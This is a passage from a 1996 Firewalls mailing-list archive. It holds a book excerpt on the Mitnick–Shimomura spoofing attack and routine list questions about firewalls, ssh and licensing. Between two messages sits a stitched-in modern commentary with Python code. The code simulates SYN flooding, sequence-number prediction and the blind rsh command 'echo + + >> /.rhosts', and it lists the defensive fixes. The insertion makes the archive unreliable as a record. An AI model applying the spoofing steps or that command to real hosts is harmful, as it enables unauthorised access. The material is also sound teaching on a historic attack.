The program has unlocked the sequence number key. Shimomura's machine has to be idle for the attack to succeed. New Internet connections would change the initial sequence number and make it more difficult to predict the key. That's why the hacker attacks on Christmas Day. The attack program sends packets that appear to be coming from the trusted machine. The packet's return or source address is the trusted machine's Internet address. Shimomura's workstation sends a packet back to the trusted machine with its initial sequence number. But flooded by the earlier flurry of packets, the trusted server is still trying to handle the earlier traffic. It's tangled up. Taking advantage of the gagged server, the attacking program sends a fake acknowledgment. It looks real because it's got the source address of the trusted server, and the correct initial sequence number. Shimomura's workstation is duped. It believes it's communicating with a trusted server. Now the attacking program tells Shimomura's obedient workstation to trust everyone. It issues the simple UNIX "Echo" command to instruct Shimomura's workstation to trust the entire Internet. At that point, Shimomura's personal and government files are open game to the world. It's more than a humiliating blow to the security expert. By making Shimomura's machine accessible from any Internet site, the intruder has masked his own location. He can return from anywhere. The hacker can't believe his good luck. The attack is only successful because Shimomura has not disabled the "R" commands, three basic commands that allow users to remotely log-in or execute programs without a password. Tens of thousands of security-conscious Internet sites, representing well over a million users, routinely block access to the R commands to avoid its well publicized abuse by hackers. It takes a few keystrokes and about thirty seconds to shut off the R commands on an Internet server. You don't even have to turn off the machine. 
Why didn't Shimomura do it? . . . Mitnick laughs. "He's [Shimomura's] not happy. I have nothing to do with it. I'm just telling you what I hear through the grapevine." [Littman] "Who do you think might have done it?" I ask the likely suspect. "How did he figure it out himself?" "He [Shimomura] realized that somebody had edited his wrapper log, which shows incoming connections. Somebody actually modified those logs, and then he was able to reconstruct what happened through these logs that were mailed to another site unbeknownst to the intruder." Mitnick's actually telling me the evidence Shimomura collected to figure out the attack. The wrapper is supposed to control connections to Shimomura's server and log all connection attempts. It failed to protect Shimomura but still it logged the hacker's spoofed connection, and a copy of the log was e-mailed off-site. "So you were asking me if there's a secure e-mail site?" Mitnick continues, his voice suddenly hard. "My answer is no. This guy in my estimation is the brightest in security on the whole Internet. He blows people like Neil Clift away. I have a lot of respect for this guy. 'Cuz I know a lot about him. He doesn't know anything about me, hopefully, but he's good. "On the Internet, he's one of the best in the world." [pp. 222-25] ----- [KM] "I don't know what his motive is. I don't know the man at all. Alls I know is he's very technical and he's very good at what he does. He's in the top five." [JL] "What makes Shimomura so good?" [M] "When someone penetrates his system he knows what to look for. When you compile a program, it uses external files and libraries. This is the type of guy that would look at the access times of the files to try to figure out what type of program somebody was compiling. The guy's sharp." On UNIX systems it's possible to tell the last time a file was read. 
Mitnick's guessing that Shimomura could determine the type of application that was compiled (converted into the computer's most basic machine language) by examining the date stamps in certain system directories. He's also acknowledging he knows that the intruder compiled a program while he was on Shimomura's machine. Once again, Kevin Mitnick seems to have an amazing amount of detail on how Shimomura analyzes an attack. [M] "He's just very good at -- well, he's a spook. What do you expect? This is only what I hear in the grapevine." ... [L] "But does the grapevine say he's primarily a spook?" [M] "Unknown. He's good in security and he consults with companies like Trusted Information Systems, the people that develop Internet fire walls, and a lot of people in D.C. and the Virginia area." Trusted Information -- the name strikes a bell. Markoff quoted someone from Trusted Information in his front-page "Data Threat" article. [L] "Where is Trusted Information?" [M] "Oh, in Maryland, 301 area code. Baltimore, I believe." [L] "What are some of the Virginia companies Shimomura works with?" [M] "I just have the phone numbers," Mitnick reveals casually. "I haven't called them yet to see." [pp. 252-53] ----- Why not ask John Markoff about the real reason he called me twice this morning? So I ask him about the Shimomura Newsweek story, and the odd reference to cellular phones. He comes back with a stunning revelation. "Somebody hit a different Tsutomu machine last summer and the NSA was pissed," Markoff tells me. "They freaked out. There's no question about it." Why didn't he mention this in his New York Times stories? Why create the false appearance Shimomura was first hacked Christmas Day? "But it was a different machine?" I ask. "Am I being interviewed here?" It strikes me as an odd question. Markoff was the one who called me twice in the space of an hour. Who's interviewing whom? "Let's get on the same wavelength," Markoff suggests. 
"I'm glad to share this stuff with you, but I want to know where it's going to show up. 'Cuz I'm pretty close to Shimo and it's an issue for me." Before I can respond, he starts talking about Shimomura again. "I wrote that profile of Tsutomu because after I mentioned him in the bottom of my story ["Data Threat"] I basically outed him and a million reporters were all over him." "He wasn't happy about that?" "No, Tsutomu loves it," Markoff says. "He's playing his own games. "I'II tell you it's unclear what was taken [referring to the Christmas hack], and point two, I can send you a public posting by an Air Force information warfare guy who described what was taken and their assessment of the damage. "And there are lots of little snips of code that a brilliant hacker could probably use. But Tsutomu's mind works in very cryptic ways. It's not clear that without Tsutomu you're going to be able to do anything with it. "Now in this break-in I don't actually think a lot of stuff was taken." This break-in? Just how many times was Shimomura hacked before Christmas? But I ask a different question. "Why would an Air Force guy post something?" "Oh, Tsutomu," Markoff casually replies. "He produced a lot of software for the Air Force." "Where would he post this?" "Oh, to a mailing list. A lot of people were concerned about what was taken from his [Shimomura's] machine. What they [the hacker] got was a lot of his electronic mail. Some of it's kind of embarrassing. [But] I don't think people are going to find new ways to attack the network based on this particular attack. "There is another issue," Markoff cautions in a serious tone. "Tsutomu is a very sharp guy, and it is not impossible that that was a bait machine, which is why I stayed away from the issue." Is Markoff implying Shimomura, a rumored NSA spy, laid a trap? And what about Markoff's New York Times articles? Were they part of the trap, too? "Think about it for a second," Markoff pauses dramatically. 
"And you get into this wilderness-of-mirrors kind of world. And a lot of people that are writing don't know everything, and I don't know everything. "I've been protecting him [Shimomura] for five years. I get the profile and the [Wall Street] Journal is on him. They don't know how close he is to the military. It would make perfect sense. Who knows what's on the code? The guy is in the counterintelligence business." [pp. 258-60] From firewalls-owner Mon Jan 8 13:34:52 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id NAA16438 for firewalls-outgoing; Mon, 8 Jan 1996 13:21:00 -0800 (PST) Received: from sivka.carrier.kiev.ua (sivka.carrier.kiev.ua [193.125.68.130]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id NAA16423 for ; Mon, 8 Jan 1996 13:20:48 -0800 (PST) Received: from elvisti.kiev.ua (uucp@localhost) by sivka.carrier.kiev.ua (Sendmail 8.who.cares/5) with UUCP id XAA11330 for Firewalls@GreatCircle.COM; Mon, 8 Jan 1996 23:21:00 +0200 Received: from office.elvisti.kiev.ua (office.elvisti.kiev.ua [193.125.28.33]) by spider2.elvisti.kiev.ua (8.6.12/8.ElVisti) with ESMTP id XAA19991 for ; Mon, 8 Jan 1996 23:24:57 +0200 Received: (from stesin@localhost) by office.elvisti.kiev.ua (8.6.12/8.ElVisti) id XAA17001; Mon, 8 Jan 1996 23:24:56 +0200 From: "Andrew V. Stesin" Message-Id: <199601082124.XAA17001@office.elvisti.kiev.ua> Subject: Re: Firewalls-Digest V5 #8 -Reply To: DPANG@QUEENS.HAWAII.ORG (DARRYL PANG) Date: Mon, 8 Jan 1996 23:24:55 +0200 (EET) Cc: Firewalls@GreatCircle.COM In-Reply-To: from "DARRYL PANG" at Jan 8, 96 07:56:01 am X-Mailer: ELM [version 2.4 PL24alpha5] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hello, # # FYI gang. And "NO" we are NEVER going to use # FreeBSD!! # Wouldn't you mind commenting your point with a bit more details, please? # # Mahalo, DPP. \m/ ^_^ \m/ # # ++++++++++++++++++++++++++++++++++++ # A Manager does the thing right. 
# A Leader does the right thing.
# ++++++++++++++++++++++++++++++++++++
#

[... the only mention of FreeBSD here -- a story from bart@pu.com -- skipped; what's wrong with it, anyway? ...]

-- With best regards -- Andrew Stesin. +380 (44) 2760188 +380 (44) 2713457 +380 (44) 2713560 An undocumented feature is a coding error.

From firewalls-owner Mon Jan 8 18:14:42 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id SAA22203 for firewalls-outgoing; Mon, 8 Jan 1996 18:08:58 -0800 (PST) Received: from mercury.tdb.gov.sg ([202.42.225.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id SAA22198 for ; Mon, 8 Jan 1996 18:08:53 -0800 (PST) Received: (from mail@localhost) by mercury.tdb.gov.sg (8.6.12/8.6.12) id KAA08391 for ; Tue, 9 Jan 1996 10:08:07 +0800 Received: from smtpgw.tdb.gov.sg(202.42.225.225) by mercury.tdb.gov.sg via smap (V1.3) id sma015554; Tue Jan 9 10:07:49 1996 Received: by smtpgw.tdb.gov.sg with Microsoft Mail id <30F2AF7E@smtpgw.tdb.gov.sg>; Tue, 09 Jan 96 10:10:06 PST From: James Soh To: "'smtp:Firewalls@GreatCircle.COM'" Subject: Fw License Date: Tue, 01 Jan 80 17:44:00 PST Message-ID: <30F2AF7E@smtpgw.tdb.gov.sg> X-Mailer: Microsoft Mail V3.0 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Is the Fw-license based on the number of internal IP addresses it protects? If our organisation has exceeded this IP protection, according to sources, it is unenforceable now; how will the FW behave? Thanks.
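The attack narrated in the Littman excerpt that Frank Willoughby forwarded above has four moving parts: gag the trusted host with a SYN flood, probe the victim for its initial-sequence-number increment, send a SYN with the trusted host's source address, then answer the SYN-ACK blind with the predicted ISN and ride the rsh trust to append "+ +" to .rhosts. The Python below is an added example that models exactly that exchange on a toy network; it is not code from the post, from the book or from Shimomura's analysis. The host names, the fixed 128,000-per-connection step, the three-host network, the simplified TCP state machine and the rsh command string are all assumptions made for illustration, and no real socket is touched.

```python
"""Toy model of IP source spoofing plus TCP ISN prediction (constructed; no real sockets)."""
import secrets
from dataclasses import dataclass

ISN_STEP = 128_000   # per-connection increment the excerpt reports (assumed constant)
MOD = 2 ** 32

@dataclass
class Segment:
    src: str
    dst: str
    flags: str          # "SYN", "SYN-ACK", "ACK" or "RST"
    seq: int
    ack: int = 0
    payload: str = ""   # rsh command riding on the first data segment (simplified)

class Host:
    """Any host: a SYN-ACK it never asked for gets a RST back, unless it is gagged."""
    def __init__(self, addr):
        self.addr, self.flooded = addr, False   # flooded is set by the attacker's SYN flood

    def receive(self, seg):
        if seg.flags == "SYN-ACK" and not self.flooded:
            return Segment(self.addr, seg.src, "RST", seq=seg.ack)

class VictimStack(Host):
    """Victim: predictable (or random) ISNs and rsh trust keyed on source address alone."""
    def __init__(self, addr, trusted_addr, predictable=True, isn0=1_000_000):
        super().__init__(addr)
        self.predictable, self._isn = predictable, isn0
        self.rhosts = {trusted_addr}   # peers allowed to run commands without a password
        self.half_open = {}            # peer -> (our ISN, peer seq expected next)
        self.executed = []             # commands accepted over rsh

    def next_isn(self):
        if self.predictable:
            self._isn = (self._isn + ISN_STEP) % MOD
        else:
            self._isn = secrets.randbelow(MOD)   # what an RFC 1948-style stack does instead
        return self._isn

    def receive(self, seg):
        if seg.flags == "SYN":
            isn = self.next_isn()
            self.half_open[seg.src] = (isn, seg.seq + 1)
            return Segment(self.addr, seg.src, "SYN-ACK", seq=isn, ack=seg.seq + 1)
        if seg.src in self.half_open and seg.flags in ("ACK", "RST"):
            isn, expected_seq = self.half_open.pop(seg.src)   # a RST tears the attempt down
            if seg.flags == "ACK" and seg.ack == isn + 1 and seg.seq == expected_seq:
                self.run_rsh(seg.src, seg.payload)             # handshake completed

    def run_rsh(self, peer, command):
        if command and ("+" in self.rhosts or peer in self.rhosts):
            self.executed.append(command)
            if command == "echo + + >> /.rhosts":
                self.rhosts.add("+")   # from now on every host is "trusted"

class Network:
    """Routes each segment by destination address and chases any reply it triggers."""
    def __init__(self, *hosts):
        self.hosts, self.log = {h.addr: h for h in hosts}, []

    def send(self, seg):
        self.log.append(seg)
        host = self.hosts.get(seg.dst)      # the attacker has no stack here; it only reads log
        reply = host.receive(seg) if host else None
        if reply:
            self.send(reply)

def probe_isn_step(net, me, victim, probes=4):
    """Open real connections from our own address and diff the ISNs that come back."""
    isns = []
    for i in range(probes):
        start = len(net.log)
        net.send(Segment(me, victim, "SYN", seq=1000 + i))
        synack = next(s for s in net.log[start:] if s.flags == "SYN-ACK" and s.dst == me)
        isns.append(synack.seq)
        net.send(Segment(me, victim, "RST", seq=synack.ack))   # drop our half-open entry
    deltas = {(b - a) % MOD for a, b in zip(isns, isns[1:])}
    return isns[-1], (deltas.pop() if len(deltas) == 1 else None)

def run_attack(flood_trusted=True, predictable_isn=True):
    victim, trusted = VictimStack("victim", "trusted", predictable_isn), Host("trusted")
    net = Network(victim, trusted)
    last_isn, step = probe_isn_step(net, "attacker", "victim")
    result = {"isn_step": step, "predicted_isn": None,
              "rhosts_open_to_all": False, "commands_run": victim.executed}
    if step is None:                   # no constant increment: nothing to predict
        return result
    result["predicted_isn"] = predicted = (last_isn + step) % MOD
    trusted.flooded = flood_trusted    # stands in for the SYN flood that gags the trusted server
    # Spoofed SYN: the victim's SYN-ACK goes to "trusted" and the attacker never sees it.
    net.send(Segment("trusted", "victim", "SYN", seq=5000))
    # Blind third handshake step with the predicted ISN, carrying the rsh command.
    net.send(Segment("trusted", "victim", "ACK", seq=5001, ack=predicted + 1,
                     payload="echo + + >> /.rhosts"))
    result["rhosts_open_to_all"] = "+" in victim.rhosts
    return result
```

Running `run_attack()` succeeds; `run_attack(flood_trusted=False)` fails because the un-gagged trusted host answers the unsolicited SYN-ACK with a RST that tears the half-open connection down before the blind ACK arrives, which is why the flood comes first in the excerpt; `run_attack(predictable_isn=False)` fails at the probing stage, since no constant increment emerges from the samples. Those two failure modes are the two fixes practitioners applied after this incident: unpredictable ISNs (RFC 1948) and, at the border, refusing inbound packets that claim an inside source address, which a packet filter in front of the victim would have done here.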
From firewalls-owner Mon Jan 8 20:44:43 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id UAA24711 for firewalls-outgoing; Mon, 8 Jan 1996 20:40:48 -0800 (PST) Received: from torres.nixltd.com.au (nautronix.com.au [203.9.79.137]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id UAA24706 for ; Mon, 8 Jan 1996 20:40:42 -0800 (PST) Received: (from uucp@localhost) by torres.nixltd.com.au (8.7.3/8.6.9) id MAA05450 for ; Tue, 9 Jan 1996 12:48:35 +0800 Received: from medusa.nixltd.com.au(192.9.200.15) by torres.nixltd.com.au via smap (V1.3) id sma005447; Tue Jan 9 12:48:08 1996 Received: by medusa.nautronix.com.au (4.1/SMI-4.1) id AA02927; Tue, 9 Jan 96 12:37:56 WST Date: Tue, 9 Jan 96 12:37:56 WST From: carl.johnson@nautronix.com.au (Carl Johnson) Message-Id: <9601090437.AA02927@medusa.nautronix.com.au> To: firewalls@greatcircle.com Subject: ssh Cc: harry.protoolis@nautronix.com.au Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

hi all, we're thinking of using ssh to allow users to log in to our internal network via our firewall (fwtk), i.e. we'll plug outside ssh connections straight thru to an internal machine running the sshd, whereupon the normal ssh authentication will happen. has anyone had (or can think of) any problems/bugs/holes etc with doing this?
c

From firewalls-owner Tue Jan 9 01:44:41 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id BAA00693 for firewalls-outgoing; Tue, 9 Jan 1996 01:25:36 -0800 (PST)
Received: from gw.rmcs.cranfield.ac.uk (gw.rmcs.cranfield.ac.uk [193.63.243.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id BAA00683 for ; Tue, 9 Jan 1996 01:24:00 -0800 (PST)
Date: Tue, 9 Jan 1996 9:22:49 GMT
From: Neil
To: firewalls@greatcircle.com
Message-Id: <960109092249.2abf@rmcs.cranfield.ac.uk>
Subject: RE: firewalls reviews/comparisons
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> I just subscribed to your mail list today so please forgive my first
> question:
> 1) Which software is required to view the .Z files and where can I get it?

uncompress will do the trick, it comes as part of any standard unix setup. Do uncompress .

> 2) I've been searching for information on the best firewall to purchase for
> our
> needs and have not come across any reviews/comparisons on which is
> best (I have a list of all of the firewalls available and their descriptions
> but
> not any comparisons). Anyone know of any reviews and where to find them?
> We require a firewall which would could support a very high throughput so
> we would probably require a hardware-based firewall. Configuring our
> front-end router to act as a firewall isn't a practical option. Any
> information would be
> appreciated. Thanks,

There was a review of commercial firewalls in (I think) Byte or something like that a little while ago, the machines being the TIS Gauntlet, Border Ware and Firewall 1. Perhaps someone with a better memory than me can clarify.

> Brian Hescock
> hescockb@86aw4.ramstein.af.mil

Yours Aye,
Neil

* Neil A Carson
* The Royal Military College of Science, Shrivenham
* e-mail carson@rmcs.cranfield.ac.uk
* Address: Kitchener Mess, RMCS, Shrivenham SN6 8LA.
Tel: (01793) 784428 (Home)

From firewalls-owner Tue Jan 9 04:14:57 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id EAA03324 for firewalls-outgoing; Tue, 9 Jan 1996 04:02:34 -0800 (PST)
Received: from ranma.coc.powell-river.bc.ca ([204.174.4.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id EAA03319 for ; Tue, 9 Jan 1996 04:02:22 -0800 (PST)
Received: (from fubar@localhost) by ranma.coc.powell-river.bc.ca (8.6.9/8.6.9) id EAA05318; Tue, 9 Jan 1996 04:41:32 -0800
Date: Tue, 9 Jan 1996 04:41:30 -0800
From: Failed Uni-Bus Address Register
Subject: IP/Port Filtering. (Was Re: SSL and S-HTTP Proxy support)
To: firewalls@GreatCircle.COM
In-Reply-To: <199601081755.LAA21565@shade.sctc.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Mon, 8 Jan 1996, Rick Smith wrote:

[Discussion on SSL and other such stuff snipped..]

> The service is based on a generic proxy that tunnels the traffic
> through the firewall. Some firewalls (like Sidewinder) can apply
> access controls as follows:
>
> 1) permit/deny traffic according to source IP address.
> 2) permit/deny traffic according to destination IP address.
> 3) restrict to inbound only or outbound only.
> 4) require login/password from browser.

We have been considering purchasing a firewall for our local ISP, and I've been reading this list trying to glean information on which setup would be best for us. One of the things we're looking for, and it's something I've not seen mentioned here, is the ability to outgoing traffic based on destination IP/PORT AND source IP. The reasoning behind this being the school district here would like to restrict student access to some services, while still allowing the faculty unrestricted access.

Is there a setup that will do this? Is this fairly commonplace?

Thanks in advance..
:)

Aluve,
Warren

---------------------------------------=---------------------------------
= fubar@ranma.coc.powell-river.bc.ca  = Powell River Community Network   =
= Powell River, BC, Canada            = System Development Staff         =
=--------------------------------------=--------------------------------=

From firewalls-owner Tue Jan 9 04:29:55 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id EAA03480 for firewalls-outgoing; Tue, 9 Jan 1996 04:12:33 -0800 (PST)
Received: from mailgate.ericsson.se (mailgate.ericsson.se [130.100.2.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id EAA03475 for ; Tue, 9 Jan 1996 04:12:23 -0800 (PST)
Received: from poem.emw.ericsson.se (poem.emw.ericsson.se [136.225.97.22]) by mailgate.ericsson.se (8.6.11/1.0) with ESMTP id NAA11541 for ; Tue, 9 Jan 1996 13:11:21 +0100
Received: from shakespeare.emw.ericsson.se (shakespeare.emw.ericsson.se [136.225.97.10]) by poem.emw.ericsson.se (8.6.12/8.6.12) with SMTP id NAA12237 for ; Tue, 9 Jan 1996 13:12:47 +0100
Received: from hathaway.nis.gsunix (hathaway.emw.ericsson.se) by shakespeare.emw.ericsson.se (4.1/LME-DOM-2.2.4) id AA03932; Tue, 9 Jan 96 13:12:24 +0100
Date: Tue, 9 Jan 96 13:12:24 +0100
From: emwmf@emw.ericsson.se (Martin Fredriksson)
Message-Id: <9601091212.AA03932@shakespeare.emw.ericsson.se>
To: firewalls@greatcircle.com
Subject: single service "fw" setup?
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

We have two networks (net1, net2) which are separated for security reasons. I now face the requirement to be able to share network (floating) licenses between these networks (yes, the legal aspects about this sharing have been taken care of...:-). The license server runs on a Sun machine, and it works by listening to one specified TCP port, over which it receives and answers license requests. It is possible to run several license servers on the same machine, but it has to be the SAME machine (licenses are locked to hostid).
My suggestion, which I would very much appreciate comments to, is to use a dual homed Sun on which I run two instances of the license server, each serving a different port on each of the two interfaces. The Sun is attached to two intermediate networks (fwnet1, fwnet2), which are separated from the production networks (net1, net2) via filtering routers. Something like:

    net1          fwnet1              fwnet2          net2
     !              !                   !              !
     !--- router ---!--- Sun server ---!--- router ---!
     !              !                   !              !

The Sun machine is configured as defensively as possible (no ip forward, no services but the license servers running chroot:ed as unprivileged user, etc). The router filters are as prohibitive as possible, only allowing traffic to the designated license server TCP ports.

I would very much appreciate comments on this suggestion! My main questions are:

(1) Are there any obvious problems with this setup?
(2) Are there any advantages in replacing/complementing the routers with a bastion-host (fwtk/plug-gw type of thing)?
(3) Is there a better solution?

Any tips or comments appreciated!
Thanks,
/// Martin F

From firewalls-owner Tue Jan 9 07:14:56 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id GAA06207 for firewalls-outgoing; Tue, 9 Jan 1996 06:59:22 -0800 (PST)
Received: from su1.in.net (su1.in.net [199.0.62.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id GAA06200 for ; Tue, 9 Jan 1996 06:59:14 -0800 (PST)
Received: from pm1-29.in.net by su1.in.net with SMTP (5.65/1.2-eef) id AA17357; Tue, 9 Jan 96 09:57:46 -0500
Date: Tue, 9 Jan 96 09:57:46 -0500
Message-Id: <9601091457.AA17357@su1.in.net>
X-Sender: frankw@in.net
X-Mailer: Windows Eudora Version 1.4.4
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
To: firewalls@GreatCircle.com
From: frankw@in.net (Frank Willoughby)
Subject: Re: Off-Topic: Selling Firewalls
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

>
>
>> Please don't flame me for this (possibly) off-topic question, but I
>> think, the best answer for my question is with the members of this great list.
>>

Wouldn't think of it.

>> I started working for a VAR of firewalls and other network related
>> products. When it comes to writing proposals, I feel there must be
>> tools to effectively support the selling process
>>
>> - how to draw network designs

I would recommend a graphics package called VISIO from the Shapeware Corp. (I believe their homepage is http://www.visio.com). Their Windows-based product features "drag and drop" design capability. Another advantage is the fact that it runs on a laptop which makes it easy to update diagrams for customer-specific presentations while on the road (but not while driving). 8^) The product is available in most large computer stores. I don't remember what I paid for the software, but it was worth it in the time it saved me. (The markup on software in Europe is truly abominable). Assuming you know how you want the drawing to look like, you can put together a drawing in @15 minutes.
The stencils for network diagrams are included in the "VISIO for Business Graphics" package which should suffice for what you need to do. They also have a Network diagram package which includes more network stencils for you (again, you probably won't need it).

>> - how to calculate network topology, eg. IP-numbers and netmasks

It really depends on what you want to look at (do you just want to figure out what protocols are out there, or do you want to have it draw a network topology diagram for you). Take a look at Network General, HP, DEC, Sun, etc.

>> - how to calculate the costs for the equipment (firewalls, routers ...)
>> - how to ...

This also depends. Since you are a VAR, you are kind of stuck in your pricing & your ability to be neutral in recommending products to your customers (I don't have this problem). I know many companies (sadly) which have a markup of 200-300% of American products in Europe to take into account the currency fluctuations and keep the product price fairly stable. Don't forget to build a "fudge factor" in figuring out lead times in getting products delivered just in case the equipment doesn't arrive on the day you expect it to (snowstorms, strikes, government shutdowns, etc.).

Another alternative is to tie the price of the equipment to the US dollar costs, add your profit margin, and hope the dollar stays stable enough until your next catalogue comes out. 8^) Given the current value of the dollar (undervalued IMHO), this may be a prudent move for now, anyway, you may want to change later (your mileage may vary, of course). Another thing you can do is to look at your competitor's prices and plot your course from there.

Also, no matter which firewalls, routers, or other equipment you choose, try to find the best security product which represents the best value (including price & ability to provide adequate security) to the customer.
>>
>> How do you network consultants and reseller work out there, how do
>> you make your life easier when it comes to desktop work. I feel
>> there are better tools than M$-Word or Powerpoint to generate good
>> proposals and solutions.
>>
>> TIA, Andreas
>> -- Andreas Grau grau@muc.de

Rather than spawn a PC vs Mac vs Workstation thread, I'll just say it just depends on your personal preferences. Two important features in whatever product you select are portability & reliability. You will definitely want to take the computer with you on the road & systems which are taken on the road suffer a fair amount of abuse. Having a system die on the way to a customer site won't work wonders for your image. BTW, don't forget to take into consideration the physical weight of the computer you are going to carry through airports, parking lots, endless corridors, etc. Laptop-size computers are truly wonderful devices.

Hope the above helps you get started.

Best Regards,

Frank

Fortified Networks Inc. - Management & Information Security Consulting
Phone: (317) 573-0800 - http://www.fortified.com/fortified/
The opinions expressed above are of the author and may not necessarily be representative of Fortified Networks Inc.
From firewalls-owner Tue Jan 9 08:59:59 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id IAA08356 for firewalls-outgoing; Tue, 9 Jan 1996 08:53:25 -0800 (PST)
Received: from aspensys ([198.77.70.103]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id IAA08351 for ; Tue, 9 Jan 1996 08:53:21 -0800 (PST)
Received: from smtpinet.aspensys.com (smtpgate.aspensys.com) by aspensys (5.0/SMI-SVR4) id AA27172; Tue, 9 Jan 1996 11:46:24 +0500
Received: from ccMail by smtpinet.aspensys.com (SMTPLINK V2.10.08) id AA821218226; Tue, 09 Jan 96 12:09:35 EST
Date: Tue, 09 Jan 96 12:09:35 EST
From: "Jim Meritt"
Message-Id: <9600098212.AA821218226@smtpinet.aspensys.com>
To: firewalls@GreatCircle.com
Subject: charlatan
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

When email is received, some places apparently check a couple of things (from field and ...?) and if they do not match (?) print the error message "You are a charlatan" and do not accept the mail.

What are they checking? We appear to be a site which doesn't satisfy the checks from some places, and I REALLY want to be able to re-match...
Jim Meritt

From firewalls-owner Tue Jan 9 09:14:57 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id JAA08547 for firewalls-outgoing; Tue, 9 Jan 1996 09:02:32 -0800 (PST)
Received: from beach.sctc.com (beach.sctc.com [192.55.214.50]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id JAA08542 for ; Tue, 9 Jan 1996 09:02:28 -0800 (PST)
Received: from beach.sctc.com (daemon@localhost) by beach.sctc.com (8.7.2/8.7.2) with ESMTP id LAA17121; Tue, 9 Jan 1996 11:01:29 -0600 (CST)
Received: from sphinx.sctc.com (sphinx.sctc.com [172.17.192.3]) by beach.sctc.com (8.7.2/8.7.2) with ESMTP id LAA17116; Tue, 9 Jan 1996 11:01:28 -0600 (CST)
Received: from shade.sctc.com (shade.sctc.com [172.17.192.48]) by sphinx.sctc.com (8.7.1/8.6.10) with SMTP id LAA00891; Tue, 9 Jan 1996 11:02:04 -0600 (CST)
Received: (from smith@localhost) by shade.sctc.com (8.6.12/8.6.9) id LAA04266; Tue, 9 Jan 1996 11:02:05 -0600
Date: Tue, 9 Jan 1996 11:02:05 -0600
From: Rick Smith
Message-Id: <199601091702.LAA04266@shade.sctc.com>
To: firewalls@greatcircle.com
Cc: smith@sctc.com, jamessoh@tdb.gov.sg
Subject: Re: Fw License
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

James Soh asks:

>Is the Fw-license based on the number of internal IP addresses it protects?

It probably depends on the vendor. Sidewinder is sold as a device, so the costs are related to the number of Sidewinders bought, not the traffic each one handles.

Does anyone perceive a benefit to sites in charging according to the number of hosts protected? Is there some situation in which such charges might make sense?

Rick.
smith@sctc.com secure computing corporation

From firewalls-owner Tue Jan 9 10:02:14 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id IAA08349 for firewalls-outgoing; Tue, 9 Jan 1996 08:53:07 -0800 (PST)
Received: from mycroft.GreatCircle.COM (mycroft.greatcircle.com [198.102.244.35]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id IAA08344 for ; Tue, 9 Jan 1996 08:53:03 -0800 (PST)
Received: by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-951213) id IAA14732; Tue, 9 Jan 1996 08:50:19 -0800
Received: from bprevisora.fin.ec(157.100.183.2) by mycroft via smap (V1.3mjr) id sma014718; Tue Jan 9 08:49:20 1996
Received: from oscar by bprevisora.fin.ec with smtp (Smail3.1.28.1 #8) id m0tZj4R-0001KMC; Tue, 9 Jan 96 10:46 PST
Message-Id:
From: "Oscar Schneegans"
Organization: Banco La Previsora
To: Firewalls@GreatCircle.COM
Date: Tue, 9 Jan 1996 11:01:24 -500
Subject: Where we get it
Reply-to: previco2@previcompu.com.ec
X-mailer: Pegasus Mail/Windows (v1.22)
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> From: mcb@GreatCircle.COM (Michael C. Berch)

We're looking for an Internet Security software solution, something like the firewall concept or some other product.

Our basic problem is the matching of the Bank's private IP Address type B and the Bank's assigned Internet Address type C; regarding the security matter and the possibility of any station inside the private network being allowed to access the Internet world masked with the corresponding type C Address.

Sincerely,
Ing.
Oscar Schneegans

Please contact us as soon as possible.
Thanks a million.

Phone: 566100 Ext-Fax :1100
       563100
       515000
Internet: oscar@bprevisora.fin.ec

From firewalls-owner Tue Jan 9 10:12:41 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id IAA08272 for firewalls-outgoing; Tue, 9 Jan 1996 08:51:16 -0800 (PST)
Received: from beach.sctc.com (beach.sctc.com [192.55.214.50]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id IAA08259 for ; Tue, 9 Jan 1996 08:51:11 -0800 (PST)
Received: from beach.sctc.com (daemon@localhost) by beach.sctc.com (8.7.2/8.7.2) with ESMTP id KAA16680; Tue, 9 Jan 1996 10:49:12 -0600 (CST)
Received: from sphinx.sctc.com (sphinx.sctc.com [172.17.192.3]) by beach.sctc.com (8.7.2/8.7.2) with ESMTP id KAA16676; Tue, 9 Jan 1996 10:49:12 -0600 (CST)
